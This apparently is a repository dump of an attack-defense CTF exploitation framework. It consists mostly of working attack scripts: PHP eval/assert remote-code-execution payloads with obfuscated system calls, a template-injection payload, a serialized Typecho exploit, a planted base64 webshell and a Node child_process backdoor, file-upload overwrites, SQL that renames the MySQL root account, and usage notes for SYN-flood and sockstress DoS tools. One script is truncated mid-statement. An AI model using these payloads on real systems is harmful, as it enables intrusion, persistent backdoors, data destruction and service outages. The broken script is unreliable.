48 | return flag,is_vuln,info,reserve 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /samples/not_use/crontab.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | 3 | import os 4 | 5 | hosts = open('../data/ip.data').readlines() 6 | for host in hosts: 7 | host = host.strip() 8 | ip,port = host.split(':') 9 | if ip=='192.168.2.56': 10 | continue 11 | port = 8080 12 | print ip 13 | r = os.popen('curl %s:%s/api/upload/ -F "type=image" -F "savepath=/gotsctf2018/controllers" -F "image=@login_controller.go" --connect-timeout 2 '%(ip,port)) 14 | r = os.popen('curl %s:%s/logout'%(ip,port)) 15 | print r.read() 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /samples/not_use/db_admin_attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | 4 | from http import http 5 | from config import * 6 | from function import * 7 | from urllib import quote 8 | 9 | def db_admin_attack(target,cmd,cookie): 10 | header = {"Cookie":cookie} 11 | res = "error" 12 | print cmd 13 | cmd = quote(cmd) 14 | try: 15 | res = http("get",target,target_port,"/ez_web/admin/db_admin.php?db=admin&action=listRows&collection=zzz&find=array(1);system('"+ cmd +"');exit;","",header) 16 | #print res 17 | except Exception,e: 18 | dump_error(target,"something error happens","db_admin_attack.py db_admin_attack") 19 | return res 20 | #print db_admin_attack("127.0.0.1","ls","PHPSESSID=vavafb01qsskmhu41dnk08d1r1;") 21 | #print db_admin_attack("127.0.0.1","/bin/echo PD9waHAgaWYoJF9SRVFVRVNUW2hhc2hdPT0iOGUwM2RmZTY0YmNmYzE5OTMyOTgxNzk3NjQxOGFiYWUiKXskY18xID0gYmFzZTY0X2RlY29kZShzdHJfcm90MTMoJF9SRVFVRVNUW2FdKSk7JGNfMiA9IGJhc2U2NF9kZWNvZGUoc3RyX3JvdDEzKCRfUkVRVUVTVFtiXSkpOyRjXzEoJGNfMik7fT8+ | /usr/bin/base64 -d | /bin/cat > 
/var/www/html/ez_web//.5ba106f5e0946576c7bdd26672bb8ee1.php","PHPSESSID=vavafb01qsskmhu41dnk08d1r1;") 22 | -------------------------------------------------------------------------------- /samples/not_use/file_write.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | 4 | from http import http 5 | from config import * 6 | from function import * 7 | from urllib import quote 8 | import time 9 | 10 | def file_write(target,filename,contents,cookie): 11 | header = {"Cookie":cookie} 12 | res = "error" 13 | print "waiting to writes shell..." 14 | i = 0 15 | for content in contents: 16 | data = "require('fs').appendFile('" + filename + "','" + content + "');1" 17 | if i==0: 18 | data = "require('fs').writeFile('" + filename + "','" + content + "');1" 19 | try: 20 | res = http("get",target,target_port,"/ez_web/admin/count.php?cheat=" + quote(data),"",header) 21 | i += 1 22 | except Exception,e: 23 | dump_error(target,"something error happens","db_admin_attack.py db_admin_attack") 24 | return False 25 | return True 26 | from login import login 27 | file_write("192.168.2.114","5",'exports.a=function(c){return require("child_process").exec(c);}',login("192.168.2.114")) 28 | -------------------------------------------------------------------------------- /samples/not_use/js_attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | 4 | from http import http 5 | from config import * 6 | from function import * 7 | from urllib import quote 8 | 9 | # u may need to change this one 10 | js_filename = ".2" 11 | 12 | def js_attack(target,cmd,cookie): 13 | header = {"Cookie":cookie} 14 | res = "error" 15 | #print cmd 16 | cmd = quote(cmd) 17 | #write js file 18 | from file_write import file_write 19 | from js_exe import js_exe 20 | file_write(target,"2",'exports.a=function(c){return require("child_process").exec(c);}',cookie) 21 | 22 | #write tmp php file 
23 | shell_name,shell,encode_shell = generate_shell(target,"") 24 | file_write(target,"3",shell,cookie) 25 | 26 | #write sh file 27 | shell_content = "mv 3 " + shell_absolute_path + "/" +shell_name 28 | file_write(target,"4",shell_content,cookie) 29 | 30 | #execute sh file 31 | js_exe(target,"2",cookie) 32 | 33 | res = execute_shell(target,cmd) 34 | 35 | return res 36 | -------------------------------------------------------------------------------- /samples/not_use/js_exe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | 4 | from http import http 5 | from config import * 6 | from function import * 7 | from urllib import quote 8 | 9 | 10 | def js_exe(target,filename,cookie): 11 | header = {"Cookie":cookie} 12 | res = "error" 13 | data = "require('./" + filename + "').a('sh ./4');1" 14 | try: 15 | res = http("get",target,target_port,"/ez_web/admin/count.php?cheat=" + quote(data),"",header) 16 | except Exception,e: 17 | dump_error(target,e,"js_exe.py js_exe") 18 | return False 19 | return res 20 | 21 | #js_exe("127.0.0.1","2","PHPSESSID=5hurakabmkompu4ks1a1g6ab75") 22 | 23 | -------------------------------------------------------------------------------- /samples/not_use/login.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | 3 | import os 4 | 5 | hosts = open('data/ip.data').readlines() 6 | for host in hosts: 7 | host = host.strip() 8 | ip,port = host.split(':') 9 | print ip 10 | r = os.popen('curl %s:%s/api/upload/ -F "type=image" -F "savepath=/gotsctf2018/controllers" -F "image=@login_controller.go" --connect-timeout 2 '%(ip,port)) 11 | r = os.popen('curl %s:%s/logout'%(ip,port)) 12 | print r.read() 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /samples/not_use/tmp.php: -------------------------------------------------------------------------------- 1 | _version = $version; 12 | 
$this->_type = $type; 13 | $this->_charset = $charset; 14 | $this->_lang = $lang; 15 | } 16 | public function addItem(array $item) 17 | { 18 | $this->_items[] = $item; 19 | } 20 | } 21 | class Typecho_Request 22 | { 23 | private $_params = array('screenName'=>'fputs(fopen(\'./usr/uploads/.a.php\',\'w\'),\'\')'); 24 | private $_filter = array('assert'); 25 | //private $_filter = array('assert', array('Typecho_Response', 'redirect')); 26 | } 27 | $payload1 = new Typecho_Feed(5, 'ATOM 1.0'); 28 | $payload2 = new Typecho_Request(); 29 | $payload1->addItem(array('author' => $payload2)); 30 | $exp['adapter'] = $payload1; 31 | $exp['prefix'] = 'Rai4over'; 32 | echo base64_encode(serialize($exp)); 33 | -------------------------------------------------------------------------------- /samples/old/ali_assert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | #cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | #payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | payload = cmd 25 | data = 'form_id=user_register_form&mail[0][#lazy_builder][0]=system&mail[#type]=markup&mail[0][#lazy_builder][1][0]=%s'% quote(payload) 26 | res = http("post",target,target_port,"/user/register?element_parents=account/mail/%23value&ajax_form=1",data,headers) 27 | except Exception,e: 28 | debug_print(traceback.format_exc()) 29 | dump_error("attack failed",target,"vulnerable attack") 30 | res = "error" 31 | 32 | return res 33 
| 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /samples/old/bctf_exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | 10 | 11 | def vulnerable_attack(target,target_port,cmd): 12 | 13 | ''' 14 | this is the payload script for vuln: 15 | 16 | eval($_POST[333]); 17 | assert($_POST[333]); 18 | ''' 19 | try: 20 | payload = "/{{().__class__.__bases__.0.__subclasses__().59.__init__.__globals__.linecache.os.popen(\"" + cmd + "\").read()}}" 21 | res = http("get",target,target_port,payload,"",headers) 22 | before = "

URL " 23 | after = " not found


" 24 | s = res[res.find(before)+len(before):res.find(after)] 25 | res = s 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | -------------------------------------------------------------------------------- /samples/old/bctf_read.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | try: 18 | payload = "/link?url=file:///flag" 19 | res = http("get",target,target_port,payload,"",headers) 20 | res = cmd_prefix + str(res)+ cmd_postfix 21 | except Exception,e: 22 | debug_print(traceback.format_exc()) 23 | dump_error("attack failed",target,"vulnerable attack") 24 | res = "error" 25 | 26 | return res 27 | 28 | 29 | -------------------------------------------------------------------------------- /samples/old/hctf_edit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | from replay import * 9 | 10 | def vulnerable_attack(target,target_port,cmd): 11 | 12 | ''' 13 | this is the payload script for vuln: 14 | 15 | replay with some traffic 16 | 17 | ''' 18 | 19 | try: 20 | print "cmd => " + cmd 21 | cmd = urllib.quote(cmd) 22 | res = sequence_attack(target,target_port,cmd,'edit_page',3) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 
29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/hctf_image.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | from replay import * 9 | 10 | def vulnerable_attack(target,target_port,cmd): 11 | 12 | ''' 13 | this is the payload script for vuln: 14 | 15 | replay with some traffic 16 | 17 | ''' 18 | 19 | try: 20 | print "cmd => " + cmd 21 | cmd = urllib.quote(cmd) 22 | res = sequence_attack(target,target_port,cmd,'image_upload',3) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/hctf_inc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | from replay import * 9 | 10 | def vulnerable_attack(target,target_port,cmd): 11 | 12 | ''' 13 | this is the payload script for vuln: 14 | 15 | replay with some traffic 16 | 17 | ''' 18 | 19 | try: 20 | print "cmd => " + cmd 21 | cmd = urllib.quote(cmd) 22 | res = sequence_attack(target,target_port,cmd,'inc',2) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/hwb_eval.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 
| from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | #cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | res = http("get",target,target_port,"/index.php/index/index/?back1=system&back2=%s"%quote(cmd),"",headers) 24 | except Exception,e: 25 | debug_print(traceback.format_exc()) 26 | dump_error("attack failed",target,"vulnerable attack") 27 | res = "error" 28 | 29 | return res 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /samples/old/mysql.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | from replay import * 9 | 10 | def vulnerable_attack(target,target_port,cmd): 11 | 12 | ''' 13 | this is the payload script for vuln: 14 | 15 | replay with some traffic 16 | 17 | ''' 18 | 19 | try: 20 | print "cmd => " + cmd 21 | cmd = urllib.quote(cmd) 22 | res = sequence_attack(target,target_port,cmd,'sql',3) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/php_assert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from 
framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'shell=%s'% quote(payload) 25 | res = http("post",target,target_port,"/.shell.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/old/php_input_include.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | include "php://input"; 15 | 16 | ''' 17 | 18 | try: 19 | cmd = urllib.unquote(cmd) 20 | cmd = base64.b64encode(cmd) 21 | data = ""%cmd 22 | res = http("post",target,target_port,"/index.php?f=a",data,headers) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/php_system.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from 
framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | #cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | data = 'haozigege=%s'% quote(cmd) 24 | res = http("post",target,target_port,"/charpter2-1.0-SNAPSHOT/1.jsp",data,headers) 25 | except Exception,e: 26 | debug_print(traceback.format_exc()) 27 | dump_error("attack failed",target,"vulnerable attack") 28 | res = "error" 29 | 30 | return res 31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /samples/old/qwb_block_2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | import hashlib 9 | import time 10 | 11 | 12 | def vulnerable_attack(target,target_port,cmd): 13 | 14 | 15 | try: 16 | # This payload may not work under some php versions 17 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 18 | #print payload 19 | res = block(target,target_port,cmd) 20 | res = cmd_prefix + res + cmd_postfix 21 | except Exception,e: 22 | debug_print(traceback.format_exc()) 23 | dump_error("attack failed",target,"vulnerable attack") 24 | res = "error" 25 | 26 | return res 27 | 28 | 29 | 30 | def block(target,target_port,cmd): 31 | s = requests.Session() 32 | ip = target 33 | url_11 = "http://%s:%s/app.php/classroom/1" % (ip,str(target_port)) 34 | data = ");UPDATE mysql.user SET User='aaaaaaaaaaaa' WHERE user='root';FLUSH PRIVILEGES;#/manage" 35 | url_11 = url_11 + 
quote(data) 36 | print s.get(url_11).content 37 | 38 | 39 | url_final = 'http://%s:%s/app.php/admin/course_set/1/delete' % (ip,str(target_port)) 40 | res = s.get(url_final).content 41 | return res 42 | -------------------------------------------------------------------------------- /samples/old/sample.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[222]); 15 | 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | payload = "$a='sy'.'stem';$b = '%s';$a(base64_decode($b));"%cmd 21 | data = '222=%s'% quote(payload) 22 | res = http("post",target,target_port,"/index.php",data,headers) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/sequence_attack_eval.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | from replay import * 9 | 10 | def vulnerable_attack(target,target_port,cmd): 11 | 12 | ''' 13 | this is the payload script for vuln: 14 | 15 | replay with some traffic 16 | 17 | ''' 18 | 19 | try: 20 | print "cmd => " + cmd 21 | cmd = base64.b64encode(cmd) 22 | cmd = urllib.quote(cmd) 23 | res = sequence_attack(target,target_port,cmd,'php_eval',1) 24 | except Exception,e: 25 | debug_print(traceback.format_exc()) 26 | dump_error("attack failed",target,"vulnerable 
attack") 27 | res = "error" 28 | 29 | return res 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /samples/old/shit_assert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'cmd=%s'% (payload) 25 | headers['Cookie'] = data 26 | headers['X-Forwarded-For'] = '8.8.8.8' 27 | res = http("post",target,target_port,"/index.php/admin/login/backdoor?hongkexueyuan=assert",data,headers) 28 | except Exception,e: 29 | debug_print(traceback.format_exc()) 30 | dump_error("attack failed",target,"vulnerable attack") 31 | res = "error" 32 | 33 | return res 34 | 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /samples/old/shit_assert_2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload 
= "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = '222=%s'% quote(payload) 25 | res = http("post",target,target_port,"/1.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/old/shit_assert_3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | data = 'cmd=%s'% (flag_path) 24 | headers['Cookie'] = data 25 | headers['X-Forwarded-For'] = '8.8.8.8' 26 | res = http("post",target,target_port,"/index.php/admin/login/backdoor?hongkexueyuan=highlight_file",data,headers) 27 | except Exception,e: 28 | debug_print(traceback.format_exc()) 29 | dump_error("attack failed",target,"vulnerable attack") 30 | res = "error" 31 | 32 | if len(res) ==32: 33 | res = cmd_prefix + res + cmd_postfix 34 | else: 35 | res = 'error' 36 | return res 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /samples/old/wdb_assert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from 
framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'a=%s'% quote(payload) 25 | res = http("post",target,target_port,"/tmp/99.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/old/wdb_assert_2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'value=%s'% quote(payload) 25 | res = http("post",target,target_port,"/data/user/1.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 
33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/old/wdb_read4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import requests,re 4 | from framework.http import http 5 | from framework.config import * 6 | from framework.function import * 7 | from urllib import quote 8 | import traceback 9 | from random import randint 10 | 11 | def vulnerable_attack(target,target_port,cmd): 12 | 13 | ''' 14 | this is the payload script for vuln: 15 | 16 | echo file_get_contents($_POST[444]); 17 | 18 | ''' 19 | 20 | try: 21 | cmd = flag_path 22 | data = quote(cmd) 23 | #res = http("get",target,target_port,"/bigbrother?filename="+data,'',headers) 24 | print 'haozigege' 25 | res = attack(target,target_port,cmd) 26 | # Even though we can not execute the cmd with the vuln, but we can read flag 27 | # and we want to use our framework to carry out this attack 28 | # not do the replicate tasks to code a new script 29 | res = cmd_prefix + res + cmd_postfix 30 | except Exception,e: 31 | debug_print(traceback.format_exc()) 32 | dump_error("attack failed",target,"vulnerable attack") 33 | res = "error" 34 | 35 | return res 36 | 37 | def attack(ip,port,cmd): 38 | my_socket = ip + ':' + str(port) 39 | flag_regex_pattern = "[0-9a-fA-F\-]{36}" 40 | rep = requests.get("http://%s/"%my_socket).content 41 | if 42 | 43 | 44 | 45 | 46 | print rep.content 47 | return rep.content 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /samples/old/yun_assert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for 
vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'haozigege=%s'% quote(payload) 25 | res = http("post",target,target_port,"/index.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/old/yunan_assert_1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'c=%s'% quote(payload) 25 | res = http("post",target,target_port,"/a.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /script/.1.php: -------------------------------------------------------------------------------- 1 | 2 | 
-------------------------------------------------------------------------------- /script/1.php: -------------------------------------------------------------------------------- 1 | aaaa bbbb -------------------------------------------------------------------------------- /script/README.md: -------------------------------------------------------------------------------- 1 | ####synflood 2 | 3 | ddos/yssyn/synflood 4 | 5 | Usage: 6 | ./synflood 7 | Example: 8 | ./synflood 112.74.12.29 8999 10000000 0 1000000000 20 9 | 10 | ####tcp connect 11 | 12 | ddos/sockstress 13 | 14 | Usage: 15 | ./sockstress : [-p payload] [-d delay] 16 | Example: 17 | ./sockstress 112.74.12.29:8999 eth0 18 | -------------------------------------------------------------------------------- /script/docker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | docker run -v `pwd`:/var/www/html -p 83:8888 -ti web_14.04 /var/www/html/run.sh 3 | -------------------------------------------------------------------------------- /script/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | service apache2 start 3 | service mysql start 4 | /bin/bash -------------------------------------------------------------------------------- /script/sockstress: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/script/sockstress -------------------------------------------------------------------------------- /script/synflood: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/script/synflood -------------------------------------------------------------------------------- /script/test.php: -------------------------------------------------------------------------------- 
1 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /script/test.sh: -------------------------------------------------------------------------------- 1 | #! /bin/bash 2 | function read_dir(){ 3 | for file in `ls $1` #注意此处这是两个反引号,表示运行系统命令 4 | do 5 | if [ -d $1"/"$file ] #注意此处之间一定要加上空格,否则会报错 6 | then 7 | read_dir $1"/"$file 8 | else 9 | echo $1"/"$file #在此处处理文件即可 10 | fi 11 | done 12 | } 13 | read_dir $1 | grep .php | xargs sed -i '$a\' 14 | -------------------------------------------------------------------------------- /script/test2.sh: -------------------------------------------------------------------------------- 1 | function read_dir(){ for file in `ls $1`;do if [ -d $1"/"$file ];then read_dir $1"/"$file;else echo $1"/"$file;fi;done };read_dir $1 | grep .php | xargs sed -i '$a\' 2 | -------------------------------------------------------------------------------- /seq/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/__init__.py -------------------------------------------------------------------------------- /seq/attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from new_replay import * 4 | import requests 5 | import hashlib 6 | import time 7 | 8 | target = '47.105.121.116' 9 | target_port = 8801 10 | my_hash = hashlib.md5('xxxx' + str(target) + str(target_port) + str(time.time())).hexdigest() 11 | file_dir = 'seq/read_flag_qwb/' 12 | s = requests.session() 13 | 14 | request_1 = open(file_dir + '1.txt').read() 15 | reply_1 = 